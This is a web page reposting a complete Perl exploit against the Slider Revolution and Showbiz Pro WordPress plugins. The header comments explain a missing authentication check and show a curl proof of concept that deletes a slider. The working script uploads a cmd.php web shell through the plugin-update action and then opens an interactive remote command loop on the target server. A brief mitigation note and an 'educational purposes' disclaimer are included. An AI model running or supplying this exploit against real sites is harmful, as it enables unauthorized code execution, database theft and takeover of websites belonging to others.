扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 |
#!/usr/bin/perl # # Title: Slider Revolution/Showbiz Pro shell upload exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered: 15 October 2014 # Coded: 15 October 2014 # Updated: 25 November 2014 # Published: 25 November 2014 # MorXploit Research # http://www.MorXploit.com # Vendor: ThemePunch # Vendor url: http://themepunch.com # Software: Revslider/Showbiz Pro # Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro) # Products url: # http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988 # Vulnerable scripts: # revslider/revslider_admin.php # showbiz/showbiz_admin.php # # About the plugins: # The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any # kind of content whith highly customizable, transitions, effects and custom animations. # Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set # amount of teaser items. # # Description: # Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated # attacker to abuse administrative features. # Some of the features include: # Creating/Deleting/Updating sliders # Importing/exporting sliders # Updading plugin # For a full list of functions please see revslider_admin.php/showbiz_admin.php # # PoC on revslider: # 1- Deleting a slider: # root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" # http://****.com/wp-admin/admin-ajax.php # * Connected to ****.com (**.**.**.**) port 80 (#0) # > POST /wp-admin/admin-ajax.php HTTP/1.1 # > User-Agent: curl/7.35.0 # > Host: ****.com # > Accept: */* # > Content-Length: 73 # > Content-Type: application/x-www-form-urlencoded # > # * upload completely sent off: 73 out of 73 bytes # < HTTP/1.1 200 OK # < Date: Fri, 24 Oct 2014 23:25:07 GMT # * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted # < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 # < X-Powered-By: PHP/5.4.18 # < X-Robots-Tag: noindex # < X-Content-Type-Options: nosniff # < Expires: Wed, 11 Jan 1984 05:00:00 GMT # < Cache-Control: no-cache, must-revalidate, max-age=0 # < Pragma: no-cache # < X-Frame-Options: SAMEORIGIN # < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/ # < Transfer-Encoding: chunked # < Content-Type: text/html; charset=UTF-8 # < # * Connection #0 to host http://****.com left intact # # {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"} # # 2- Uploading an web shell: # The following perl exploit will try to upload an HTTP php shell through the the update_plugin function # To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php # http://www.morxploit.com/morxploits/revslider.zip # http://www.morxploit.com/morxploits/showbiz.zip # and save them it in the same directory where you have the exploit. # # Demo: # perl morxrev.pl http://localhost revslider # =================================================== # --- Revslider/Showbiz shell upload exploit # --- By: Simo Ben youssef <simo_at_morxploit_com> # --- MorXploit Research www.MorXploit.com # =================================================== # [*] Target set to revslider # [*] MorXploiting http://localhost # [*] Sent payload # [+] Payload successfully executed # [*] Checking if shell was uploaded # [+] Shell successfully uploaded # # Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # www-data@MorXploit:~$ # # Download: # Exploit: # http://www.morxploit.com/morxploits/morxrevbiz.pl # Exploit update zip files: # http://www.morxploit.com/morxploits/revslider.zip # http://www.morxploit.com/morxploits/showbiz.zip # # Requires LWP::UserAgent # apt-get install libwww-perl # yum install libwww-perl # perl -MCPAN -e 'install Bundle::LWP' # For SSL support: # apt-get install liblwp-protocol-https-perl # yum install perl-Crypt-SSLeay # # Mitigation: # Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have # decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the # latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an # auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get # plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the # auto-update feature on, otherwise ... you are screwed. # Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system # as well as the ability to dump the entire wordpress database locally. # That being said, upgrade immediately to the latest version or disable/switch to another plugin. # As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1). # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use or damage. Use at your own risk. # # Got comments or questions? # Simo_at_MorXploit_dot_com # # Did you like this exploit? # Feel free to buy me a beer =) # My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u # Cheers! use LWP::UserAgent; use MIME::Base64; use strict; sub banner { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "===================================================\n"; print "--- Revslider/Showbiz shell upload exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "===================================================\n"; } if (!defined ($ARGV[0] && $ARGV[1])) { banner(); print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; print "perl $0 http://localhost showbiz\n"; exit; } my $zip1 = "revslider.zip"; my $zip2 = "showbiz.zip"; unless (-e ($zip1 && $zip2)) { banner(); print "[-] $zip1 or $zip2 not found! RTFM\n"; exit; } my $host = $ARGV[0]; my $plugin = $ARGV[1]; my $action; my $update_file; if ($plugin eq "revslider") { $action = "revslider_ajax_action"; $update_file = "$zip1"; } elsif ($plugin eq "showbiz") { $action = "showbiz_ajax_action"; $update_file = "$zip2"; } else { banner(); print "[-] Wrong plugin name\n"; print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; print "perl $0 http://localhost showbiz\n"; exit; } my $target = "wp-admin/admin-ajax.php"; my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent(); my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$target"); unless ($status->is_success) { banner(); print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } banner(); print "[*] Target set to $plugin\n"; print "[*] MorXploiting $host\n"; my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); print "[*] Sent payload\n"; if ($exploit->decoded_content =~ /Wrong update extracted folder/) { print "[+] Payload successfully executed\n"; } elsif ($exploit->decoded_content =~ /Wrong request/) { print "[-] Payload failed: Not vulnerable\n"; exit; } elsif ($exploit->decoded_content =~ m/0$/) { print "[-] Payload failed: Plugin unavailable\n"; exit; } else { $exploit->decoded_content =~ /<\/b>(.*?)<br>/; print "[-] Payload failed:$1\n"; print "[-] " . $exploit->decoded_content unless (defined $1); print "\n"; exit; } print "[*] Checking if shell was uploaded\n"; sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] } my $rndstr = rndstr(8, 1..9, 'a'..'z'); my $cmd1 = encode_base64("echo $rndstr"); my $status = $ua->get("$host/$shell?cmd=$cmd1"); if ($status->decoded_content =~ /system\(\) has been disabled/) { print "[-] Xploit failed: system() has been disabled\n"; exit; } elsif ($status->decoded_content !~ /$rndstr/) { print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } elsif ($status->decoded_content =~ /$rndstr/) { print "[+] Shell successfully uploaded\n"; } my $cmd2 = encode_base64("whoami"); my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); my $cmd3 = encode_base64("uname -n"); my $uname = $ua->get("$host/$shell?cmd=$cmd3"); my $cmd4 = encode_base64("id"); my $id = $ua->get("$host/$shell?cmd=$cmd4"); my $cmd5 = encode_base64("uname -a"); my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); print $unamea->decoded_content; print $id->decoded_content; my $wa = $whoami->decoded_content; my $un = $uname->decoded_content; chomp($wa); chomp($un); while () { print "\n$wa\@$un:~\$ "; chomp(my $cmd=<STDIN>); if ($cmd eq "exit") { print "Aurevoir!\n"; exit; } my $ucmd = encode_base64("$cmd"); my $output = $ua->get("$host/$shell?cmd=$ucmd"); print $output->decoded_content; } |
体验盒子
